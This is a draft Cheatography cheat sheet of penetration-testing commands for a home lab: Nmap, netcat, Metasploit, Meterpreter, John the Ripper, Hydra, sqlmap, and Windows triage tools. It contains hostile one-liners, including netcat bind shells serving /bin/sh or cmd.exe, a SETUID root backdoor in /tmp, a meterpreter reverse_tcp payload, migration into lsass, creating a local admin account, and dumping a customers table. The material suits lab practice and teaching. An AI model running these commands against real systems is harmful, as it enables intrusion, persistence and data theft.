Cheatography

Cybersecurity Homelab Cheat Sheet (DRAFT) by

A collection of commands in various Cybersecurity tools for testing within your home lab

This is a draft cheat sheet. It is a work in progress and is not finished yet.

Nmap

nmap -A <target> --reason -oN <file>
nmap -p port(s) target --reason
nmap -sV -p port(s) target --reason
nmap -p <port> --script http-enum <target>
scripts:
http-enum, http-title, smb-os-discovery, smb-brute

Netcat

nc -lnvp 7777
create listener
nc -nv <IP> <Port>
connect
nc -lnvp <Port> -e /bin/sh
listener that serves /bin/sh (Unix)
nc -lnvp <Port> -e cmd.exe
listener that serves cmd.exe (Windows)
while [ 1 ]; do echo "Started"; nc -lnp <port> -e /bin/sh; done
set up persistent listener (restarts nc after each disconnect)

Wmic

wmic process list brief
wmic process where name="<process.exe>" list full
wmic process where processid="<PID>" list full
wmic process where processid="<PID>" get name,commandline,processid,parentprocessid
wmic process where name="<process.exe>" get name,commandline,processid,parentprocessid
wmic startup

Regedit and Startup

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\
Run, RunOnce, RunOnceEx
sc query | more
Windows services
Tasklist /svc
shows Process, PID, services
taskschd.msc
task scheduler GUI
schtasks | more
CLI show scheduled tasks
schtasks /delete /tn <ta­skn­ame>
Delete a scheduled task
lusrmgr.msc
local users and groups GUI
secpol.msc
local security policy GUI
check local policies, audit policy, audit logon events
reg query <HKEY...>
shows what is in the registry key

DNS

nslookup
from Windows
server <IP>
ls -d target.tgt
attempt a zone transfer from a Windows system
dig @<IP> target.tgt -t AXFR
from Unix
attempt a zone transfer

Metasploit

search keyword type:exploit
use exploit/windows/smb/psexec
set SMBUser <admin_user>
set SMBPass <admin_pass>
set SMBDomain <windows domain>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <localIP>
set RHOST <target>

Meterpreter

migrate -N lsass.exe
shell
background
route add <targetIP> <subnetMask> 1
pivot through session 1 when targeting <targetIP>

John The Ripper

unshadow /etc/passwd /etc/shadow > /tmp/combined
john /tmp/combined
john <hashfile> (LANMAN hash)
john --format=NT <hashfile> (NT hash)
Delete john.pot when you want to restart a cracking session; otherwise, it starts where it left off.

Hydra

hydra -l <username> -p <password> ssh://<targetIP>
hydra -l <username> -P <passwordList.txt> ssh://<targetIP>
hydra -L <usernameList.txt> -p <password> ssh://<targetIP>
services: SSH, SMB, FTP (change the URI scheme)

SETUID shells

find / -uid 0 -type f -perm -4000 2>/dev/null
find files starting at the root directory that are owned by root, are regular files (not directories), and have the SETUID bit set; send errors to /dev/null.
cp /bin/sh /tmp/backdoor
sudo chown root:root /tmp/backdoor
sudo chmod 4755 /tmp/backdoor
/tmp/backdoor -p
creates a SETUID root copy of sh in /tmp (the find command above will list it)

Windows Net, SMBclient, SSH

net user <username> <password> /add
net localgroup administrators <username> /add
net user <username> /delete
net use * \\target\C$ password /u:targetIP\username
net use * /d /y
smbclient -U username -L server -m SMB3
smbclient -U username //server/C$ -m SMB3
smbclient -U DOM\\username //server/C$ -m SMB3
ssh username@hostname
scp username@hostname:/path/to/file ./
copy to local host
scp file1 file2 username@hostname:
copy file(s) to remote host

Alternate Data Streams

dir /r
show ADS in CMD
Get-Item -Path <filepath> -Stream *
show ADS in PowerShell
lads C:\ /S
search for ADS streams using LADS
lads C:\ /S | findstr /V "Error 1921"
filter out LADS errors
more < file:streamName
get ADS content in CMD
Get-Content -Path <filepath> -Stream <streamName>
get ADS content in PowerShell

wget and curl

wget <URL/filename.txt>
download a file locally
wget -qO- <URL/filename.txt>
download and display file contents
curl -iI <URL/filename.txt>
display server header response
curl -o filename.txt <URL/filename.txt>
download a file locally, saving it as filename.txt
curl --silent -b "cookiename=cookievalue" <URL/filename.txt>
download and display file, suppressing progress, with specified cookie

SQLi

sqlmap -u 'URL/page?param=1&param2=2'
always start with a valid URL, in quotes
sqlmap -u 'http://www[…]=1&param2=2' --dbs
enumerate databases
sqlmap -u 'http://www[…]=1&param2=2' -D dbname --tables
enumerate tables in the selected database dbname
sqlmap -u 'http://www[…]=1&param2=2' -D dbname -T customers --dump
retrieve all rows in the dbname.customers table